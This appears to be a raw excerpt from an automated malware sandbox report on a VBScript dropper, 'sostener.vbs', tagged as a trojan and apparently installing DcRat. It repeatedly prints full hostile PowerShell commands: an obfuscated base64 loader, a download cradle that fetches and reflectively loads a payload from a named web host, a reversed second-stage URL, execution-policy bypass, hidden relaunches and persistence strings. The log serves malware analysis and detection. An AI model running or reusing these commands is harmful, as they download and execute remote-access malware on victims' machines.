                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, Settings.csBase64 encoded string: 'rdvg6WR9YpK4ldjpOONzY1prolv9NEkpkwUs2GkgR//0YtYH71rbxnR4PfBGmKhcLHtUrWgSsu+78LWRDCPstL0LWyHbVXPesRyBf8ep2nk=', 'kavigSNbfCs4IxuRCpfhumt7bCDlfiYTnBbT8pebQJaPJb8mlJBl7LhTP3A3D1oAvA9GgjgmY82OkDe1wp1WS9wyXKoH33DKgXCHGkVhdxmVDR5O3ckPdt7AZq6A27WPZ45ZZYqJ0Q/xn4KPodqJiJV3Tjop6IJ2RAcH6E9eLR2IIauR8fzkjhfIpmJxMk+CP8AYqydzOwaR03qYahkZv3rhQlsHUWeqGeYQtjFnvewL7x93qMLeiQt6fahVgVjBmll1DTYlzCGoaCZMRzXSKcKaffC71+RasCUhGK18dCw=', 'jVe/CHyxeji+ISSX691hV54Pga5de6Nfp7sJWmdTAzHCaR7mZl2MO65Hk6KJMauS9Y6jw9wXKcqYOT2qrHh4JQ==', 'vVLVqaAyjFawc15DAD8/cfIQb0Gumvo25eyVv99u7lA+4pgQQfe5He3KVJsqW0aNW9hTCtQIhPaNPwOsYJIAxA=='
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@68/59@5/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\DcRatMutex_qwqdanchun
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axi13bk3.zvh.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sostener.vbsReversingLabs: Detection: 13%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
